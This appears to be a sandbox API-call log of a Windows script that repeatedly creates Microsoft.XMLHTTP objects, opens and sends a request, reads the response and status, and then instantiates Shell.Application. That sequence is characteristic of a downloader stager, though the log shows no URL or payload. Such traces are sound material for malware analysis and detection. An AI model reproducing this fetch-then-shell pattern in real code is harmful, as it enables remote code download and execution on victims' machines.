	[0440.000] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0440.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0440.000] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0440.000] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0440.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0440.000] ??2@YAPEAX_K@Z () returned 0x62f330
	[0440.000] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f330) 
	[0440.000] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0440.000] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0440.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0440.000] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0440.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0440.000] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0440.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0440.001] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0440.001] SysStringLen (param_1=0x0) returned 0x0
	[0440.001] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0440.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0440.001] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0440.001] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0440.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0440.001] ??2@YAPEAX_K@Z () returned 0x62f310
	[0440.001] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0440.001] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0440.001] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0440.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0440.001] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0440.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0440.001] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0440.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0440.002] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0440.002] SysStringLen (param_1=0x0) returned 0x0
	[0440.002] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0440.002] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0440.002] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0440.002] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0440.002] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7ca8) returned 0x0
	[0440.002] ??2@YAPEAX_K@Z () returned 0x62f330
	[0440.002] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7ca8, pUnkSite=0x62f330) 
	[0440.002] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0440.002] XMLHTTPRequest:IUnknown:Release (This=0x49c7ca8) returned 0x0
	[0440.002] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0440.002] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0440.002] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0440.003] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0440.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0440.003] longjmp () 
	[0440.003] longjmp () 
	[0440.003] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0440.003] SysStringLen (param_1=0x0) returned 0x0
	[0440.003] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0440.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0440.003] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0440.003] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0440.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0440.003] ??2@YAPEAX_K@Z () returned 0x62f310
	[0440.003] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0440.003] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0440.003] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0440.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0440.003] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0440.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0440.004] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0440.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0440.004] longjmp () 
	[0440.004] longjmp () 
	[0440.004] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0440.004] SysStringLen (param_1=0x0) returned 0x0
	[0440.004] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0440.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0440.004] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0440.004] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0440.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0440.004] ??2@YAPEAX_K@Z () returned 0x62f330
	[0440.004] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0440.004] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0440.005] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0440.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0440.005] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0440.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0440.005] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0440.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0440.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0440.005] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0440.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0441.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0441.090] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0441.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0441.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0441.091] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0441.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0441.091] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0441.091] SysStringLen (param_1=0x0) returned 0x0
	[0441.091] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0441.091] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0441.091] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0441.091] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0441.091] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0441.091] ??2@YAPEAX_K@Z () returned 0x62f350
	[0441.091] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0441.091] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0441.092] Shell:IUnknown:Release (This=0x396800) returned 0x1
